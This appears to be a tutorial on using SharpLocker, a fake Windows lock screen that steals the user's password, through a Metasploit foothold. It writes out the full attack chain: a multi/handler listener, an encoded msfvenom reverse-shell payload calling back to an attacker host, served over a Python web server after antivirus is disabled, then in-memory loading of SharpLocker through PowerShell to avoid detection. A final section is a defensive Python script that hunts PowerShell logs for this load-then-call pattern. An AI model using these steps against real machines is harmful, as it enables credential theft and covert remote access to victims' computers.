SharpLocker

SharpLocker is a tool that helps hackers steal Windows credentials by popping up a fake Windows lock screen. All of the output is sent to the console, which works well with Cobalt Strike or Metasploit. The tool can be injected into memory to avoid detection.

How to use SharpLocker with Metasploit

Suppose you have a foothold on a Windows machine that you are hacking and you want to attempt snagging the user’s credentials.

Assuming you have a meterpreter session running, you can easily upload SharpLocker.exe and execute the application.

Note: running the .exe is not the intended way of using SharpLocker. It’s supposed to be injected into memory and never touch disk, but this method does work. This could get detected by heuristic analysis. See the lab below for more details.

# meterpreter session
upload SharpLocker.exe
shell
SharpLocker.exe

At this point a screen should pop up that looks identical to a user logon screen.

(SharpLocker Login Screen)

When the user enters their password, it will be put into the meterpreter session for you to use.

Let’s Look at the Source Code

To clone the GitHub repository you can run this command.

git clone https://github.com/Pickfordmatt/SharpLocker

SharpLocker’s GitHub Repository

https://github.com/Pickfordmatt/SharpLocker

Full Walkthrough & Lab Setup

In this lab, I’m going to do this in a Windows environment using a Docker image of Parrot OS and run a Windows 10 Enterprise victim machine in Hyper-V. I wasn’t able to get this to work in Windows Sandbox (wouldn’t return password) so I decided to use a Hyper-V image.

I’ll also do things slightly differently than in the initial demo.

Attack Machine Firewall

Make sure you have ports 4444 and 8080 open for traffic.

Windows 10 Enterprise Setup

Trial Windows 10 Enterprise Hyper-V
https://developer.microsoft.com/en-us/windows/downloads/virtual-machines/

You will need to create a user or change the password of the default user in Windows 10.

For this demo, we will also disable the antivirus in the VM. Microsoft Security Essentials is quick to pick up meterpreter payloads. There are ways around this, but that’s not what this tutorial is about. Focus!

Default Windows 10 Enterprise password is: “Passw0rd!”

Metasploit Listener in Parrot OS (Docker)

Being that I am a .NET developer, who loves Docker, I want to demonstrate this on Windows using a Docker image of Parrot OS.

# create a parrotos/work dir if you don't already have one...
mkdir -p parrotos/work
cd parrotos

# start parrotos from docker (run from the parrotos folder so $PWD/work resolves to parrotos/work)
docker run --rm -it -v $PWD/work:/work -p 4444:4444 parrotsec/security

# go into work folder (inside the container)
cd work

Let me explain what some of these docker options do.
--rm – removes the docker container when it’s exited.
-it – gives us an interactive terminal to the container.
-v – a bind mount that maps our local parrotos/work folder to the container’s /work folder.
-p 4444:4444 – maps host port 4444 to the container’s port 4444.
-p 8080:8080 – maps host port 8080 to the container’s port 8080 (used by the second container, started below).

Start Metasploit Multi Handler to Catch the Shell

# start msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.12
set LPORT 4444
run

Msfvenom Meterpreter Exploit

You’ll need your machine’s local LAN IP address for this demonstration.

# get local lan ip
ipconfig

# start parrotos from docker (2nd tab for msfvenom)
docker run --rm -it -v $PWD/work:/work -p 8080:8080 parrotsec/security

# go into work folder
cd work

# generate meterpreter exploit
msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp LHOST=192.168.0.12 LPORT=4444 -e x86/shikata_ga_nai -f exe > msf.exe

For the sake of this demonstration, we’re just going to drop the meterpreter exploit onto the machine and run it so that we can get a hook back to our multi-handler.

I’m going to use the python3 built-in web server to drop the msf.exe. Make sure you are in the work folder.

# run python web server
python3 -m http.server 8080

Stealing Creds with SharpLocker

In order to use SharpLocker with PowerShell, we’re going to need to make the class public. This is the easy way; there are other ways.

Program.cs

Change “static class Program” to “public static class Program”, and also change “static void Main()” to “public static void Main()”.

namespace SharpLocker
{
    public static class Program
    {
        /// <summary>
        /// The main entry point for the application.
        /// </summary>
        [STAThread]
        public static void Main()
        {
            Application.EnableVisualStyles();
            Application.SetCompatibleTextRenderingDefault(false);
            Application.Run(new LockScreenForm());
        }
    }
}

Then recompile…

At this point, we should have a Metasploit session started. We’ll assume this is a hypothetical situation where we’ve established a foothold on a machine. Now, we can upload SharpLocker.exe and run it in the memory of PowerShell.

# using first tab with multi handler
meterpreter> shell

upload SharpLocker.exe

# get current directory
pwd
# returns - C:\Users\User\Downloads

# load PowerShell extension
load powershell
powershell_execute [Reflection.Assembly]::LoadFile("C:\Users\User\Downloads\SharpLocker.exe")
powershell_execute [SharpLocker.Program]::Main()

I checked it in the Task Manager by hitting CTRL + ALT + DELETE.
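From the defender's side, the two PowerShell lines above (an assembly loaded by path from a user-writable folder, then a static method called on a type from it) form a pattern that can be hunted in PowerShell script block log text (event ID 4104). The following is an added example, not part of the original post or of SharpLocker; it assumes script block logging is enabled and that events were exported as dicts with hypothetical `host`, `time` and `script` keys, and the sample records are constructed.

```python
import re
from datetime import datetime, timedelta

# [Reflection.Assembly]::LoadFile("path") or ::LoadFrom("path")
LOAD_RE = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::(?:LoadFile|LoadFrom)"
                     r"\(\s*[\"']([^\"']+)[\"']", re.IGNORECASE)
# Static call on a namespaced type: [Namespace.Type]::Method(
CALL_RE = re.compile(r"\[([A-Za-z_]\w*(?:\.\w+)+)\]::(\w+)\(")
FRAMEWORK = ("system.", "microsoft.", "reflection.")
USER_WRITABLE = re.compile(r"\\(users|temp|programdata)\\", re.IGNORECASE)
WINDOW = timedelta(minutes=10)  # assumed correlation window


def find_load_then_call(events):
    """Return (host, assembly_path, 'Type::Method', confidence) tuples."""
    findings, loads = [], {}  # loads: host -> [(time, path, file stem)]
    for ev in sorted(events, key=lambda e: e["time"]):
        host, text = ev["host"], ev["script"]
        for m in LOAD_RE.finditer(text):
            path = m.group(1)
            if USER_WRITABLE.search(path):
                stem = re.split(r"[\\/]", path)[-1].rsplit(".", 1)[0].lower()
                loads.setdefault(host, []).append((ev["time"], path, stem))
        for m in CALL_RE.finditer(text):
            type_name = m.group(1)
            if type_name.lower().startswith(FRAMEWORK):
                continue  # skips the Assembly::LoadFile call itself too
            for when, path, stem in loads.get(host, []):
                if ev["time"] - when <= WINDOW:
                    conf = "high" if type_name.lower().startswith(stem + ".") else "medium"
                    findings.append((host, path, f"{type_name}::{m.group(2)}", conf))
    return findings


T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [  # constructed records, not real log data
    {"host": "WS01", "time": T0,
     "script": r'[Reflection.Assembly]::LoadFile("C:\Users\User\Downloads\SharpLocker.exe")'},
    {"host": "WS01", "time": T0 + timedelta(seconds=20),
     "script": "[SharpLocker.Program]::Main()"},
    {"host": "WS02", "time": T0, "script": "[System.IO.Path]::GetTempPath()"},
    {"host": "WS03", "time": T0,
     "script": r'[Reflection.Assembly]::LoadFrom("C:\Program Files\Vendor\Lib.dll")'},
    {"host": "WS03", "time": T0 + timedelta(seconds=5), "script": "[Lib.Util]::Init()"},
]

if __name__ == "__main__":
    for finding in find_load_then_call(SAMPLE_EVENTS):
        print(finding)
```

A "high" finding means the called type's root namespace matches the loaded file name; a renamed assembly still surfaces as "medium" because the load and the call fall in the same window on the same host.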
